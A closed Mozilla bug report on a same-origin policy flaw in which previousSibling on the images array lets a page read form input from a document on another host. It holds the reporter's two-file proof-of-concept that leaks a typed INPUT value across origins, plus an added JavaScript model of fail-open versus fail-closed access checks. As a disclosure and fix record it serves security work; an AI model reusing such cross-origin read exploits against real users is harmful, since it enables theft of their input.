Closed Bug 22909 Opened 25 years ago Closed 25 years ago

previousSibling vulnerability

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

previousSibling is exposed in the images array. This allows access to parts of
the DOM of a document from another host. Especially bad is accessing the forms
array by using images[x].previousSibling.

The code is:
------------------------read3.html-----------------------------------
<HTML>
<HEAD><TITLE>Images 2</TITLE>
</HEAD>
Type something in the INPUT element in the other window, then
<SCRIPT>
a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html");
function f()
{
alert("The value is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value);
}
</SCRIPT>
<A HREF="javascript:f()">click here to get it</A>
</HTML>
---------------------------------------------------------------------

------------------links2.html (on another web server)----------------
<HTML>
<IMG SRC="ball.gif">
<FORM NAME="f" ACTION="#">
<INPUT TYPE="TEXT">
<INPUT TYPE="SUBMIT">
</FORM>
<IMG SRC="ball.gif">
</HTML>
---------------------------------------------------------------------
Status: NEW → ASSIGNED
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
This should have been checked by the default preferences, but the mechanism got
skewed. Hopefully the changes I've committed will make it harder for this to
happen in the future.

Until this change hits, however, all DOM property access must be considered broken.
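The reporter's access path through images[1].previousSibling, replayed in an added JavaScript model (not Mozilla's code and not the fix committed for this bug) against a per-property cross-origin policy table: one variant fails open on an unlisted property, as the skewed mechanism did, the other treats every unlisted property as sameOrigin. The origins, the policy table and the node layout of links2.html are constructed assumptions.

```javascript
// Constructed stand-in for links2.html: IMG, whitespace text, FORM (with an INPUT), IMG.
function buildLinks2Document() {
  const input = { value: "typed in the other window" };
  const form = { elements: [input] };
  const img1 = {};
  form.previousSibling = img1;
  const text = { previousSibling: form };
  const img2 = { previousSibling: text };
  return { images: [img1, img2], forms: [form] };
}

// Cross-origin read policy keyed by DOM property name. A property missing from
// the table should be treated as sameOrigin (denied). `failOpen` models the bug:
// a gap in the table that let previousSibling reach another host's DOM.
function makeAccessCheck(policy, failOpen) {
  return (prop, docOrigin, callerOrigin) => {
    if (docOrigin === callerOrigin) return true;
    const rule = policy[prop];
    return rule === undefined ? failOpen : rule === "allAccess";
  };
}

// Wrap a foreign document so every property read, on the document and on any
// node reached through it, passes through the access check first.
function guardDocument(doc, docOrigin, callerOrigin, canAccess) {
  const wrap = (obj, path) => new Proxy(obj, {
    get(target, prop) {
      const name = String(prop);
      const isIndex = Array.isArray(target) && /^\d+$/.test(name); // collection index, not a DOM property
      if (!isIndex && !canAccess(name, docOrigin, callerOrigin)) {
        throw new Error(`SecurityError: ${callerOrigin} cannot read ${path}.${name} of ${docOrigin}`);
      }
      const value = target[prop];
      return value !== null && typeof value === "object" ? wrap(value, `${path}.${name}`) : value;
    },
  });
  return wrap(doc, "document");
}

// Replay the reporter's access path under a fail-open and a fail-closed policy.
function reproduce(failOpen) {
  const policy = { images: "allAccess" }; // sibling and form properties deliberately unlisted
  const check = makeAccessCheck(policy, failOpen);
  const doc = guardDocument(buildLinks2Document(), "http://lists.nat.bg", "http://other.example", check);
  try {
    return { leaked: doc.images[1].previousSibling.previousSibling.elements[0].value };
  } catch (e) {
    return { denied: e.message };
  }
}
```

With the fail-closed policy the very first unlisted read, previousSibling on the image, is refused, so the form's INPUT value is never reachable from the other origin.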
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?